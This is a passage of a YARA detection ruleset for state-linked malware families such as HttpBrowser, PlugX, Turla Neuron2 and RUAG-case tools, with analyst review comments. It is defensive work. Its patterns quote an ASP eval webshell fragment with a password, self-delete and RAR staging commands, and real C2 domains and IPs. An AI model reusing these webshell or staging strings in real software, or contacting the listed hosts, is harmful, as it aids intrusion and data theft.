rule liudoor { meta: author = "RSA FirstWatch" date = "2015-07-23" description = "Detects Liudoor daemon backdoor" hash0 = "78b56bc3edbee3a425c96738760ee406" hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e" hash2 = "531d30c8ee27d62e6fbe855299d0e7de" hash3 = "2be2ac65fd97ccc97027184f0310f2f3" hash4 = "6093505c7f7ec25b1934d3657649ef07" type = "Win32 DLL" strings: $string0 = "Succ" $string1 = "Fail" $string2 = "pass" $string3 = "exit" $string4 = "svchostdllserver.dll" $string5 = "L$,PQR" $string6 = "0/0B0H0Q0W0k0" $string7 = "QSUVWh" $string8 = "Ht Hu[" condition: all of them }
/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-08-06 Identifier: Threat Group 3390 */
/*
   HttpBrowser RAT dropper, variant 1. The $x* strings are the numbered
   config lines the dropper carries (cmd.exe, ShellExecuteA, a self-delete
   command, SetThreadPriority); the condition (continued below) requires
   all four plus one $op* opcode inside a PE under 400KB. The $s* strings
   inside the /* ... */ block that follows are deliberately disabled and
   are not referenced by the condition; they are left as documentation of
   the dropped file names.
*/
rule HttpBrowser_RAT_dropper_Gen1 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907" hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7" hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9" hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753" hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b" hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53" hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc" strings: $x1 = "1001=cmd.exe" fullword ascii $x2 = "1003=ShellExecuteA" fullword ascii $x3 = "1002=/c del /q %s" fullword ascii $x4 = "1004=SetThreadPriority" fullword ascii /* $s1 = "pnipcn.dllUT" fullword ascii $s2 = "ssonsvr.exeUT" fullword ascii $s3 = "navlu.dllUT" fullword ascii $s4 = "@CONOUT$" fullword wide $s5 = "VPDN_LU.exeUT" fullword ascii $s6 = "msi.dll.urlUT" fullword ascii $s7 = "setup.exeUT" fullword ascii 
$s8 = "pnipcn.dll.urlUT" fullword ascii $s9 = "ldvpreg.exeUT" fullword ascii */ $op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b } /* Opcode */ $op1 = { e8 85 34 00 00 59 59 8b 86 b4 } /* Opcode */ $op2 = { 8b 45 0c 83 38 00 0f 84 97 } /* Opcode */ $op3 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */ $op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d } /* Opcode */ $op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 400KB and all of ($x*) and 1 of ($op*) } rule HttpBrowser_RAT_Sample1 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 80 hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b" hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb" strings: $s0 = "update.hancominc.com" fullword wide condition: uint16(0) == 0x5a4d and filesize < 100KB and $s0 } rule HttpBrowser_RAT_Sample2 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 80 hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992" strings: $s0 = "nKERNEL32.DLL" fullword wide $s1 = "WUSER32.DLL" fullword wide $s2 = "mscoree.dll" fullword wide $s3 = "VPDN_LU.exeUT" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and all of them } rule HttpBrowser_RAT_Gen { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 90 hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27" hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7" hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684" hash4 = 
"07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b" hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d" hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5" hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb" hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386" hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b" hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af" hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113" hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e" hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669" hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2" hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16" hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438" hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d" hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd" hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48" hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0" hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81" hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a" strings: $s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" fullword wide $s1 = "HttpBrowser/1.0" fullword wide $s2 = "set cmd : %s" ascii fullword $s3 = "\\config.ini" wide fullword condition: uint16(0) == 0x5a4d and filesize < 45KB and filesize > 20KB and all of them } rule PlugX_NvSmartMax_Gen { meta: description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef" hash2 = 
"1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0" hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5" hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338" hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e" strings: $s0 = "NvSmartMax.dll" fullword ascii $s1 = "NvSmartMax.dll.url" fullword ascii $s2 = "Nv.exe" fullword ascii $s4 = "CryptProtectMemory failed" fullword ascii $s5 = "CryptUnprotectMemory failed" fullword ascii $s7 = "r%.*s(%d)%s" fullword wide $s8 = " %s CRC " fullword wide $op0 = { c6 05 26 49 42 00 01 eb 4a 8d 85 00 f8 ff ff 50 } /* Opcode */ $op1 = { 8d 85 c8 fe ff ff 50 8d 45 c8 50 c6 45 47 00 e8 } /* Opcode */ $op2 = { e8 e6 65 00 00 50 68 10 43 41 00 e8 56 84 00 00 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 800KB and all of ($s*) and 1 of ($op*) } rule HttpBrowser_RAT_dropper_Gen2 { meta: description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper" author = "Florian Roth" reference = "http://snip.ly/giNB" date = "2015-08-06" score = 70 hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992" hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166" strings: $s1 = "navlu.dll.urlUT" fullword ascii $s2 = "VPDN_LU.exeUT" fullword ascii $s3 = "pnipcn.dllUT" fullword ascii $s4 = "\\ssonsvr.exe" fullword ascii $s5 = "/c del /q %s" fullword ascii $s6 = "\\setup.exe" fullword ascii $s7 = "msi.dllUT" fullword ascii $op0 = { 8b 45 0c 83 38 00 0f 84 98 } /* Opcode */ $op1 = { e8 dd 07 00 00 ff 35 d8 fb 40 00 8b 35 7c a0 40 } /* Opcode */ $op2 = { 83 fb 08 75 2c 8b 0d f8 af 40 00 89 4d dc 8b 0d } /* Opcode */ $op3 = { c7 43 18 8c 69 40 00 e9 da 01 00 00 83 7d f0 00 } /* Opcode */ $op4 = { 6a 01 e9 7c f8 ff ff bf 1a 40 00 96 1b 40 00 01 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 400KB and 3 of ($s*) and 1 of ($op*) } rule ThreatGroup3390_Strings { meta: description = "Threat Group 3390 APT - 
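Strings"
      author = "Florian Roth"
      reference = "http://snip.ly/giNB"
      date = "2015-08-06"
      score = 60
   strings:
      /* staging/collection commands seen in the intrusion: copy into
         Windows\Temp, an archiver invocation renamed to svchost.exe
         (the switches look like a RAR command line with a password),
         rename .rar to .zip, and an ASP eval() webshell with a
         hard-coded password */
      $s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
      $s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
      $s3 = "ren *.rar *.zip" fullword ascii
      $s4 = "c:\\temp\\ipcan.exe" fullword ascii
      $s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
   condition:
      1 of them and filesize < 30KB
}

/*
   Threat Group 3390 C2 infrastructure indicators: domains, IPv4
   addresses and registrant e-mail addresses as plain ASCII substrings,
   gated only on an MZ stamp. There is no filesize cap and no fullword
   modifier, so one of these tokens anywhere in a PE-looking buffer fires.
   NOTE(review):
     - several entries are subsumed by a shorter entry that is also
       listed ("apigmail.com" $s2 covers $s1/$s41/$s60/$s67,
       "darkhero.org" $s9 covers $s3/$s45/$s58/$s63, "blackcmd.com" $s6
       covers every *.blackcmd.com, and so on). They are kept so the
       match output names the exact host that was seen.
     - dotted-quad strings can also match inside longer sequences
       ("103.24.1.54" inside "103.24.1.540"), and 2015-era domains may
       since have been sinkholed or re-registered, so score = 60 is
       appropriate and a hit is a triage lead, not a verdict.
     - three exact duplicates were removed: the former $s84, $s94 and
       $s106 repeated $s83, $s88 and $s104 verbatim. The remaining
       identifiers keep their original numbers so existing references
       to $sN stay valid; the gaps are intentional.
*/
rule ThreatGroup3390_C2 {
   meta:
      description = "Threat Group 3390 APT - C2 Server"
      author = "Florian Roth"
      reference = "http://snip.ly/giNB"
      date = "2015-08-06"
      score = 60
   strings:
      /* domains */
      $s1 = "api.apigmail.com"
      $s2 = "apigmail.com"
      $s3 = "backup.darkhero.org"
      $s4 = "bel.updatawindows.com"
      $s5 = "binary.update-onlines.org"
      $s6 = "blackcmd.com"
      $s7 = "castle.blackcmd.com"
      $s8 = "ctcb.blackcmd.com"
      $s9 = "darkhero.org"
      $s10 = "dav.local-test.com"
      $s11 = "test.local-test.com"
      $s12 = "dev.local-test.com"
      $s13 = "ocean.local-test.com"
      $s14 = "ga.blackcmd.com"
      $s15 = "helpdesk.blackcmd.com"
      $s16 = "helpdesk.csc-na.com"
      $s17 = "helpdesk.hotmail-onlines.com"
      $s18 = "helpdesk.lnip.org"
      $s19 = "hotmail-onlines.com"
      $s20 = "jobs.hotmail-onlines.com"
      $s21 = "justufogame.com"
      $s22 = "lnip.org"
      $s23 = "local-test.com"
      $s24 = "login.hansoftupdate.com"
      $s25 = "long.update-onlines.org"
      $s26 = "longlong.update-onlines.org"
      $s27 = "longshadow.dyndns.org"
      $s28 = "longshadow.update-onlines.org"
      $s29 = "longykcai.update-onlines.org"
      $s30 = "lostself.update-onlines.org"
      $s31 = "mac.navydocument.com"
      $s32 = "mail.csc-na.com"
      $s33 = "mantech.updatawindows.com"
      $s34 = "micr0soft.org"
      $s35 = "microsoft-outlook.org"
      $s36 = "mtc.navydocument.com"
      $s37 = "navydocument.com"
      $s38 = "mtc.update-onlines.org"
      $s39 = "news.hotmail-onlines.com"
      $s40 = "oac.3322.org"
      $s41 = "ocean.apigmail.com"
      $s42 = "pchomeserver.com"
      $s43 = "registre.organiccrap.com"
      $s44 = "security.pomsys.org"
      $s45 = "services.darkhero.org"
      $s46 = "sgl.updatawindows.com"
      $s47 = "shadow.update-onlines.org"
      $s48 = "sonoco.blackcmd.com"
      $s49 = "test.logmastre.com"
      $s50 = "up.gtalklite.com"
      $s51 = "updatawindows.com"
      $s52 = "update-onlines.org"
      $s53 = "update.deepsoftupdate.com"
      $s54 = "update.hancominc.com"
      $s55 = "update.micr0soft.org"
      $s56 = "update.pchomeserver.com"
      $s57 = "urs.blackcmd.com"
      $s58 = "wang.darkhero.org"
      $s59 = "webs.local-test.com"
      $s60 = "word.apigmail.com"
      $s61 = "wordpress.blackcmd.com"
      $s62 = "working.blackcmd.com"
      $s63 = "working.darkhero.org"
      $s64 = "working.hotmail-onlines.com"
      $s65 = "www.trendmicro-update.org"
      $s66 = "www.update-onlines.org"
      $s67 = "x.apigmail.com"
      $s68 = "ykcai.update-onlines.org"
      $s69 = "ykcailostself.dyndns-free.com"
      $s70 = "ykcainobody.dyndns.org"
      $s71 = "zj.blackcmd.com"
      $s72 = "laxness-lab.com"
      $s73 = "google-ana1ytics.com"
      $s74 = "www.google-ana1ytics.com"
      $s75 = "ftp.google-ana1ytics.com"
      $s76 = "hotmailcontact.net"
      /* IPv4 addresses */
      $s77 = "208.115.242.36"
      $s78 = "208.115.242.37"
      $s79 = "208.115.242.38"
      $s80 = "66.63.178.142"
      $s81 = "72.11.148.220"
      $s82 = "72.11.141.133"
      $s83 = "74.63.195.236"
      $s85 = "74.63.195.237"
      $s86 = "74.63.195.238"
      $s87 = "103.24.0.142"
      $s88 = "103.24.1.54"
      $s89 = "106.187.45.162"
      $s90 = "192.151.236.138"
      $s91 = "192.161.61.19"
      $s92 = "192.161.61.20"
      $s93 = "192.161.61.22"
      $s95 = "67.215.232.179"
      $s96 = "96.44.177.195"
      $s97 = "49.143.192.221"
      $s98 = "67.215.232.181"
      $s99 = "67.215.232.182"
      $s100 = "96.44.182.243"
      $s101 = "96.44.182.245"
      $s102 = "96.44.182.246"
      $s103 = "49.143.205.30"
      /* registrant e-mail addresses */
      $s104 = "working_success@163.com"
      $s105 = "ykcaihyl@163.com"
      $s107 = "yuming@yinsibaohu.aliyun.com"
   condition:
      uint16(0) == 0x5a4d and 1 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 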
*/
/*
   Scanbox reconnaissance framework, obfuscated JavaScript variant.
   NOTE(review): low selectivity. $sa10-$sa15 are the bit-shuffles of a
   base64 encoder (">> 2", "& 3) << 4", "& 15) << 2") and of a UTF-8
   encoder ("| 192", "| 128", "| 224" are the 0xC0/0x80/0xE0 byte
   prefixes); both appear in many benign JS libraries. $sa2, $sa6 and
   $sa7 ("function", "return", "while") add nothing, and the unanchored
   regex in $sa1 matches almost any script. "all of them" still demands
   all 15 tokens, but an ordinary bundled page that ships an encoder
   next to a ten-year cookie expiry ($sa9, in milliseconds) can satisfy
   that; confirm against the referenced report before acting on a hit.
   meta also lacks description/author/date, unlike the rest of the file.
*/
rule apt_all_JavaScript_ScanboxFramework_obfuscated { meta: ref = "https://www.fidelissecurity.com/TradeSecret" strings: $sa1 = /(var|new|return)\s[_\$]+\s?/ $sa2 = "function" $sa3 = "toString" $sa4 = "toUpperCase" $sa5 = "arguments.length" $sa6 = "return" $sa7 = "while" $sa8 = "unescape(" $sa9 = "365*10*24*60*60*1000" $sa10 = ">> 2" $sa11 = "& 3) << 4" $sa12 = "& 15) << 2" $sa13 = ">> 6) | 192" $sa14 = "& 63) | 128" $sa15 = ">> 12) | 224" condition: all of them }
/*
   Neuron2 loader (Turla). The header test reads the PE signature at the
   e_lfanew offset, uint16(uint32(0x3c)) == 0x4550, rather than trusting
   the MZ stamp alone - the stricter of the two header checks used in
   this file. The "http://*:80/OWA/OAB/" strings look like wildcard-host
   URL prefixes for an Exchange OWA path (NOTE(review): inferred from the
   string shape; confirm against the NCSC reference). Any two of the six
   anonymous strings suffice.
   NOTE(review): every header gate in this file evaluates offset 0 of the
   buffer being scanned. When the ruleset is run over process memory
   (e.g. a Volatility yarascan) a scanned region usually does not start
   at the image base, so header-gated rules may stay silent even when
   their strings are present; scan the dumped module file as well.
*/
rule MW_neuron2_loader_strings : Turla APT loader { meta: description = "Rule for detection of Neuron2 based on strings within the loader" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927" strings: $ = "dcom_api" ascii $ = "http://*:80/OWA/OAB/" ascii $ = "https://*:443/OWA/OAB/" ascii $ = "dcomnetsrv.cpp" wide $ = "dcomnet.dll" ascii $ = "D:\\Develop\\sps\\neuron2\\x64\\Release\\dcomnet.pdb" ascii condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 2 of them }
/*
   Neuron2 payload decryption loop as one 40-byte opcode sequence with no
   wildcards: high confidence when it matches, but brittle against a
   recompiled or re-optimised build, so a miss here says little.
*/
rule MW_neuron2_decryption_routine : Turla APT { meta: description = "Rule for detection of Neuron2 based on the routine used to decrypt the payload" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927" strings: $ = {81 FA FF 00 00 00 0F B6 C2 0F 46 C2 0F B6 0C 04 48 03 CF 0F B6 D1 8A 0C 14 8D 50 01 43 32 0C 13 41 88 0A 49 FF C2 49 83 E9 01} condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them }
/*
   Neuron2 .NET payload. $dotnetMagic "BSJB" is the CLR metadata header
   signature and is required in addition to two of the $s* strings
   (W3SVC URL prefixes, binary name, PDB path); condition continues below.
*/
rule MW_neuron2_dotnet_strings : Turla APT { meta: description = "Rule for detection of the .NET payload for Neuron2 based on strings used" author = "NCSC" family = "Turla" reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware" date = "2018-01-18" hash1 =
"83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015" strings: $dotnetMagic = "BSJB" ascii $s1 = "http://*:80/W3SVC/" wide $s2 = "https://*:443/W3SVC/" wide $s3 = "neuron2.exe" ascii $s4 = "D:\\Develop\\sps\\neuron2\\neuron2\\obj\\Release\\neuron2.pdb" ascii condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $dotnetMagic and 2 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Turla_APT_srsvc { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7" hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac" strings: $x1 = "SVCHostServiceDll.dll" fullword ascii $s2 = "msimghlp.dll" fullword wide $s3 = "srservice" fullword wide $s4 = "ModStart" fullword ascii $s5 = "ModStop" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 20KB and ( 1 of ($x*) or all of ($s*) ) ) or ( all of them ) } rule Turla_APT_Malware_Gen1 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4" hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd" hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4" hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" hash7 
= "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a" hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98" hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f" hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2" strings: $x1 = "too long data for this type of transport" fullword ascii $x2 = "not enough server resources to complete operation" fullword ascii $x3 = "Task not execute. Arg file failed." fullword ascii $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii $s1 = "peer has closed the connection" fullword ascii $s2 = "tcpdump.exe" fullword ascii $s3 = "windump.exe" fullword ascii $s4 = "dsniff.exe" fullword ascii $s5 = "wireshark.exe" fullword ascii $s6 = "ethereal.exe" fullword ascii $s7 = "snoop.exe" fullword ascii $s8 = "ettercap.exe" fullword ascii $s9 = "miniport.dat" fullword ascii $s10 = "net_password=%s" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 2 of ($x*) or 8 of ($s*) ) ) or ( 12 of them ) } rule Turla_APT_Malware_Gen2 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4" hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd" hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" strings: $x1 = "Internal command not support =((" fullword ascii $x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii $x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii $x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii $x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii $x6 = "L|-1|try to run dll %s with user priv|" fullword ascii $x7 = 
"\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii $x8 = "\\\\%s\\pipe\\comnode" fullword ascii $x9 = "Plugin dll stop failed." fullword ascii $x10 = "AS_USER:LogonUser():%d" fullword ascii $s1 = "MSIMGHLP.DLL" fullword wide $s2 = "msimghlp.dll" fullword ascii $s3 = "ximarsh.dll" fullword ascii $s4 = "msximl.dll" fullword ascii $s5 = "INTERNAL.dll" fullword ascii $s6 = "\\\\.\\Global\\PIPE\\" fullword ascii $s7 = "ieuser.exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 5 of ($s*) ) ) or ( 10 of them ) } rule Turla_APT_Malware_Gen3 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4" hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a" hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98" hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f" hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2" hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" strings: $x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii $x2 = "WaitMutex Abandoned %p" fullword ascii $x3 = "OPER|Wrong config: no port|" fullword ascii $x4 = "OPER|Wrong config: no lastconnect|" fullword ascii $x5 = "OPER|Wrong config: empty address|" fullword ascii $x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii $x7 = "OPER|Wrong config: no auth|" fullword ascii $x8 = "OPER|Sniffer '%s' running... 
ooopppsss...|" fullword ascii $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii $s3 = "www.yahoo.com" fullword ascii $s4 = "MSXIML.DLL" fullword wide /* look-alike of the legitimate MSXML module name (extra "I") */ $s5 = "www.bing.com" fullword ascii $s6 = "%s: http://%s%s" fullword ascii $s7 = "/javascript/view.php" fullword ascii $s8 = "Task %d failed %s,%d" fullword ascii $s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii /* Gen3 condition: the $s branch is guarded by MZ + filesize, but $s1/$s2 (IE User Agent registry keys), $s3/$s5 (yahoo/bing hosts) and $s9 (MSIE UA prefix) are common in benign software, so 6 of 9 is weak on its own and a hit there should be checked against the $x strings. The "10 of them" fallback has no header guard and can also fire on non-PE input such as memory dumps. */ condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 6 of ($s*) ) ) or ( 10 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2016-05-23 Identifier: Swiss RUAG APT Case Reference: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case */ /* RUAG_Tavdig_Malformed_Executable: header-only rule, no strings. uint16(0) == 0x5a4d is "MZ"; uint32(uint32(0x3C)) reads the little-endian dword at e_lfanew, where a well-formed PE carries 0x00004550 ("PE\0\0"). The rule instead requires 0x0000AD0B (bytes 0B AD 00 00), i.e. a deliberately broken PE signature - such a file is not a loadable image and, per the description, is expected to be an embedded payload. Score 60: the pattern is specific but carries no family-specific content. */ rule RUAG_Tavdig_Malformed_Executable { meta: description = "Detects an embedded executable with a malformed header - known from Tavdig malware" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 condition: /* MZ Header and malformed PE header > 0x0bad */ uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x0000AD0B } /* RUAG_Bot_Config_File: targets the small text config itself ("[CONFIG]" at offset 0, whole file under 160 bytes), not a binary carrying these strings. "name = " is generic; "exe = cmd.exe" is the discriminating line. */ rule RUAG_Bot_Config_File { meta: description = "Detects a specific config file used by malware in RUAG APT case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $s1 = "[CONFIG]" ascii $s2 = "name = " ascii $s3 = "exe = cmd.exe" ascii condition: $s1 at 0 and $s2 and $s3 and filesize < 160 } /* RUAG_Cobra_Malware: single indicator - MZ header plus the "\Cobra\Release\Cobra.pdb" build path. PDB paths are easily stripped or changed between builds, so a miss is no evidence of absence; pair this with the Turla_APT_* rules above and the RUAG_*_Config_File rules. */ rule RUAG_Cobra_Malware { meta: description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii condition: uint16(0) == 0x5a4d and $s1 } /* RUAG_Cobra_Config_File: text config detection - "[NAME]" anchored at offset 0, 8 of the 10 section/key names, filesize under 5KB. Disjoint from RUAG_Exfil_Config_File, which anchors "[TRANSPORT]" at offset 0, even though both rules list "[TRANSPORT]" and "system_pipe". */ rule RUAG_Cobra_Config_File { meta: description = "Detects a config text file used by malware Cobra in RUAG case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $h1 = 
